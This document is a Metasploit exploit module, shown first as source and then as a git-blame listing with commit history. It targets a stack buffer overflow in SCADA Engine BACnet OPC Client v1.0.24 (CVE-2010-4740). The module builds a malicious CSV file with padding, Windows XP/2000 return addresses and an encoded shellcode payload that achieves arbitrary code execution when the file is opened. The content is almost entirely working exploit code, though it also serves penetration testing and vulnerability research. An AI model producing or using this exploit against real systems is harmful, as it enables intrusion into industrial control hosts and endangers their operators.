modules/exploits/windows/fileformat/bacnet_csv.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BACnet OPC Client Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in SCADA
        Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client
        parses a specially crafted csv file, arbitrary code may be
        executed.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Jeremy Brown', 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2010-4740' ],
          [ 'OSVDB', '68096'],
          [ 'BID', '43289' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'MinNops'  => 0,
          'MaxNops'  => 0,
          'Space'    => 698,
          'BadChars' =>  Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3 English',   { 'Ret' => 0x77e26323 } ],
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-09-16',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new( 'FILENAME',  [ false, 'The file name.',  'msf.csv' ]),
      ])

  end

  def exploit

    csv = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\"
    csv << rand_text_alpha_upper(185)
    csv << [target.ret].pack('V') + rand_text_alpha_upper(4)
    csv << payload.encoded + rand_text_alpha_upper(750 - payload.encoded.length)
    csv << "\\scada,0,0,\n"

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(csv)

  end
end
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`Rank = GoodRanking`

			`include Msf::Exploit::FILEFORMAT`
style compliance fixes 2010-11-11 18:20:52 +00:00
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'BACnet OPC Client Buffer Overflow',`
			`'Description' => %q{`
style compliance fixes, set test exploits to manual rank, fix s/ranking/rank/ in some exploits 2010-11-14 19:03:24 +00:00			`This module exploits a stack buffer overflow in SCADA`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client`
			`parses a specially crafted csv file, arbitrary code may be`
			`executed.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'Jeremy Brown', 'MC' ],`
			`'References' =>`
			`[`
Update CVE references for exploit modules 2018-07-08 18:46:04 -05:00			`[ 'CVE', '2010-4740' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '68096'],`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`[ 'BID', '43289' ],`
fix URLs not resolving 2022-01-23 15:28:32 -05:00			`[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01' ],`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
style compliance fixes 2010-11-11 18:20:52 +00:00			`},`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`'Payload' =>`
			`{`
			`'MinNops' => 0,`
			`'MaxNops' => 0,`
			`'Space' => 698,`
			`'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),`
			`'StackAdjustment' => -3500,`
			`'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",`
			`'EncoderOptions' =>`
			`{`
			`'BufferRegister' => 'ECX',`
			`},`
			`},`
			`'Platform' => 'win',`
style compliance fixes 2010-11-11 18:20:52 +00:00			`'Targets' =>`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`[`
style compliance fixes 2010-11-11 18:20:52 +00:00			`[ 'Windows XP SP3 English', { 'Ret' => 0x77e26323 } ],`
			`[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2010-09-16',`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new( 'FILENAME', [ false, 'The file name.', 'msf.csv' ]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00
			`end`

			`def exploit`

			`csv = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\"`
			`csv << rand_text_alpha_upper(185)`
			`csv << [target.ret].pack('V') + rand_text_alpha_upper(4)`
			`csv << payload.encoded + rand_text_alpha_upper(750 - payload.encoded.length)`
			`csv << "\\scada,0,0,\n"`

			`print_status("Creating '#{datastore['FILENAME']}' file ...")`

			`file_create(csv)`
style compliance fixes 2010-11-11 18:20:52 +00:00
added exploit module bacnet_csv.rb 2010-11-11 16:35:01 +00:00			`end`
			`end`